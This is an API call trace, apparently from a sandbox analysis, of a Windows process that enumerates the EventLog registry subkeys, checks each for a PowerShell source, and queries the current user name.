	[0323.620] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd438 | out: phkResult=0x1cd438*=0x308) returned 0x0
	[0323.623] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd3ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd3a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd3ac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd3a8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.623] CoTaskMemFree (pv=0x0) 
	[0323.624] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.624] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x0, lpName=0x35c680, lpcchName=0x1cd438, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd438, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.624] CoTaskMemFree (pv=0x35c680) 
	[0323.624] CoTaskMemFree (pv=0x0) 
	[0323.624] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.624] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x1, lpName=0x35c680, lpcchName=0x1cd438, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd438, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.624] CoTaskMemFree (pv=0x35c680) 
	[0323.624] CoTaskMemFree (pv=0x0) 
	[0323.624] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.624] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x2, lpName=0x35c680, lpcchName=0x1cd438, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd438, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.624] CoTaskMemFree (pv=0x35c680) 
	[0323.624] CoTaskMemFree (pv=0x0) 
	[0323.624] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.624] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x3, lpName=0x35c680, lpcchName=0x1cd438, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd438, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.625] CoTaskMemFree (pv=0x35c680) 
	[0323.625] CoTaskMemFree (pv=0x0) 
	[0323.625] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.625] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x4, lpName=0x35c680, lpcchName=0x1cd438, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd438, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.625] CoTaskMemFree (pv=0x35c680) 
	[0323.625] CoTaskMemFree (pv=0x0) 
	[0323.625] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.625] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x5, lpName=0x35c680, lpcchName=0x1cd438, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd438, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.625] CoTaskMemFree (pv=0x35c680) 
	[0323.625] CoTaskMemFree (pv=0x0) 
	[0323.625] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.625] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x6, lpName=0x35c680, lpcchName=0x1cd438, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd438, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.625] CoTaskMemFree (pv=0x35c680) 
	[0323.625] CoTaskMemFree (pv=0x0) 
	[0323.625] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.625] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x7, lpName=0x35c680, lpcchName=0x1cd438, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd438, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.625] CoTaskMemFree (pv=0x35c680) 
	[0323.625] CoTaskMemFree (pv=0x0) 
	[0323.625] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.625] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x8, lpName=0x35c680, lpcchName=0x1cd438, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd438, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.625] CoTaskMemFree (pv=0x35c680) 
	[0323.625] CoTaskMemFree (pv=0x0) 
	[0323.625] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd498 | out: phkResult=0x1cd498*=0x30c) returned 0x0
	[0323.626] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd498 | out: phkResult=0x1cd498*=0x0) returned 0x2
	[0323.626] RegOpenKeyExW (in: hKey=0x308, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd498 | out: phkResult=0x1cd498*=0x1a8) returned 0x0
	[0323.626] RegOpenKeyExW (in: hKey=0x1a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd498 | out: phkResult=0x1cd498*=0x0) returned 0x2
	[0323.626] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd498 | out: phkResult=0x1cd498*=0x330) returned 0x0
	[0323.626] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd498 | out: phkResult=0x1cd498*=0x0) returned 0x2
	[0323.626] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd498 | out: phkResult=0x1cd498*=0x334) returned 0x0
	[0323.626] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd498 | out: phkResult=0x1cd498*=0x0) returned 0x2
	[0323.626] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd498 | out: phkResult=0x1cd498*=0x338) returned 0x0
	[0323.626] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd498 | out: phkResult=0x1cd498*=0x0) returned 0x2
	[0323.626] RegOpenKeyExW (in: hKey=0x308, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd498 | out: phkResult=0x1cd498*=0x33c) returned 0x0
	[0323.626] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd498 | out: phkResult=0x1cd498*=0x0) returned 0x2
	[0323.627] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd498 | out: phkResult=0x1cd498*=0x340) returned 0x0
	[0323.627] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd498 | out: phkResult=0x1cd498*=0x0) returned 0x2
	[0323.627] RegOpenKeyExW (in: hKey=0x308, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd498 | out: phkResult=0x1cd498*=0x344) returned 0x0
	[0323.627] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd498 | out: phkResult=0x1cd498*=0x0) returned 0x2
	[0323.627] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd498 | out: phkResult=0x1cd498*=0x348) returned 0x0
	[0323.627] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd498 | out: phkResult=0x1cd498*=0x34c) returned 0x0
	[0323.627] RegCloseKey (hKey=0x34c) returned 0x0
	[0323.627] RegCloseKey (hKey=0x308) returned 0x0
	[0323.628] RegCloseKey (hKey=0x348) returned 0x0
	[0323.973] CoTaskMemAlloc (cb=0x804) returned 0x1b42c3e0
	[0323.973] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b42c3e0, nSize=0x1cd6a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd6a8) returned 0x1
	[0323.974] CoTaskMemFree (pv=0x1b42c3e0) 
	[0323.975] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.975] GetUserNameW (in: lpBuffer=0x35c680, pcbBuffer=0x1cd6e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd6e8) returned 1
	[0323.975] CoTaskMemFree (pv=0x35c680) 
	[0323.987] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x350) returned 0x0
	[0323.987] RegQueryInfoKeyW (in: hKey=0x350, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd35c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd358, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd35c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd358*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.987] CoTaskMemFree (pv=0x0) 
	[0323.987] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.987] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x0, lpName=0x35c680, lpcchName=0x1cd3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.987] CoTaskMemFree (pv=0x35c680) 
	[0323.987] CoTaskMemFree (pv=0x0) 
	[0323.987] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.987] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x1, lpName=0x35c680, lpcchName=0x1cd3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.987] CoTaskMemFree (pv=0x35c680) 
	[0323.987] CoTaskMemFree (pv=0x0) 
	[0323.987] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.987] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x2, lpName=0x35c680, lpcchName=0x1cd3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.987] CoTaskMemFree (pv=0x35c680) 
	[0323.987] CoTaskMemFree (pv=0x0) 
	[0323.987] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.987] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x3, lpName=0x35c680, lpcchName=0x1cd3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.987] CoTaskMemFree (pv=0x35c680) 
	[0323.987] CoTaskMemFree (pv=0x0) 
	[0323.987] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.987] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x4, lpName=0x35c680, lpcchName=0x1cd3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.988] CoTaskMemFree (pv=0x35c680) 
	[0323.988] CoTaskMemFree (pv=0x0) 
	[0323.988] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.988] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x5, lpName=0x35c680, lpcchName=0x1cd3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.988] CoTaskMemFree (pv=0x35c680) 
	[0323.988] CoTaskMemFree (pv=0x0) 
	[0323.988] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.988] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x6, lpName=0x35c680, lpcchName=0x1cd3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.988] CoTaskMemFree (pv=0x35c680) 
	[0323.988] CoTaskMemFree (pv=0x0) 
	[0323.988] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.988] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x7, lpName=0x35c680, lpcchName=0x1cd3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.988] CoTaskMemFree (pv=0x35c680) 
	[0323.988] CoTaskMemFree (pv=0x0) 
	[0323.988] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.988] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x8, lpName=0x35c680, lpcchName=0x1cd3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.988] CoTaskMemFree (pv=0x35c680) 
	[0323.988] CoTaskMemFree (pv=0x0) 
	[0323.988] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x354) returned 0x0
	[0323.988] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x0) returned 0x2
	[0323.988] RegOpenKeyExW (in: hKey=0x350, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x358) returned 0x0
	[0323.989] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x0) returned 0x2
	[0323.989] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x35c) returned 0x0
	[0323.989] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x0) returned 0x2
	[0323.989] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x360) returned 0x0
	[0323.989] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x0) returned 0x2
	[0323.989] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x364) returned 0x0
	[0323.989] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x0) returned 0x2
	[0323.989] RegOpenKeyExW (in: hKey=0x350, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x368) returned 0x0
	[0323.989] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x0) returned 0x2
	[0323.989] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x36c) returned 0x0
	[0323.989] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x0) returned 0x2
	[0323.990] RegOpenKeyExW (in: hKey=0x350, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x370) returned 0x0
	[0323.990] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x0) returned 0x2
	[0323.990] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x374) returned 0x0
	[0323.990] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x378) returned 0x0
	[0323.990] RegCloseKey (hKey=0x378) returned 0x0
	[0323.990] RegCloseKey (hKey=0x350) returned 0x0
	[0323.990] RegCloseKey (hKey=0x374) returned 0x0
	[0323.991] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x374) returned 0x0
	[0323.991] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd35c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd358, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd35c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd358*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.991] CoTaskMemFree (pv=0x0) 
	[0323.991] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.991] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x0, lpName=0x35c680, lpcchName=0x1cd3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.991] CoTaskMemFree (pv=0x35c680) 
	[0323.991] CoTaskMemFree (pv=0x0) 
	[0323.991] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.991] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x1, lpName=0x35c680, lpcchName=0x1cd3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.991] CoTaskMemFree (pv=0x35c680) 
	[0323.991] CoTaskMemFree (pv=0x0) 
	[0323.991] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.991] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x2, lpName=0x35c680, lpcchName=0x1cd3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.991] CoTaskMemFree (pv=0x35c680) 
	[0323.991] CoTaskMemFree (pv=0x0) 
	[0323.991] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.991] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x3, lpName=0x35c680, lpcchName=0x1cd3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.992] CoTaskMemFree (pv=0x35c680) 
	[0323.992] CoTaskMemFree (pv=0x0) 
	[0323.992] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.992] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x4, lpName=0x35c680, lpcchName=0x1cd3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.992] CoTaskMemFree (pv=0x35c680) 
	[0323.992] CoTaskMemFree (pv=0x0) 
	[0323.992] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.992] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x5, lpName=0x35c680, lpcchName=0x1cd3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.992] CoTaskMemFree (pv=0x35c680) 
	[0323.992] CoTaskMemFree (pv=0x0) 
	[0323.992] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.992] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x6, lpName=0x35c680, lpcchName=0x1cd3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.992] CoTaskMemFree (pv=0x35c680) 
	[0323.992] CoTaskMemFree (pv=0x0) 
	[0323.992] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.992] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x7, lpName=0x35c680, lpcchName=0x1cd3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.992] CoTaskMemFree (pv=0x35c680) 
	[0323.992] CoTaskMemFree (pv=0x0) 
	[0323.992] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0323.992] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x8, lpName=0x35c680, lpcchName=0x1cd3e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd3e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0323.992] CoTaskMemFree (pv=0x35c680) 
	[0323.992] CoTaskMemFree (pv=0x0) 
	[0323.992] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x350) returned 0x0
	[0323.992] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x0) returned 0x2
	[0323.992] RegOpenKeyExW (in: hKey=0x374, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x378) returned 0x0
	[0323.993] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x0) returned 0x2
	[0323.993] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x37c) returned 0x0
	[0323.993] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x0) returned 0x2
	[0323.993] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x380) returned 0x0
	[0323.993] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x0) returned 0x2
	[0323.993] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x384) returned 0x0
	[0323.993] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x0) returned 0x2
	[0323.993] RegOpenKeyExW (in: hKey=0x374, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x388) returned 0x0
	[0323.993] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x0) returned 0x2
	[0323.993] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x38c) returned 0x0
	[0323.993] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x0) returned 0x2
	[0324.007] RegOpenKeyExW (in: hKey=0x374, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x350) returned 0x0
	[0324.007] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x0) returned 0x2
	[0324.007] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x378) returned 0x0
	[0324.007] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd448 | out: phkResult=0x1cd448*=0x37c) returned 0x0
	[0324.007] RegCloseKey (hKey=0x37c) returned 0x0
	[0324.007] RegCloseKey (hKey=0x374) returned 0x0
	[0324.008] RegCloseKey (hKey=0x378) returned 0x0
	[0324.009] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3b8 | out: phkResult=0x1cd3b8*=0x378) returned 0x0
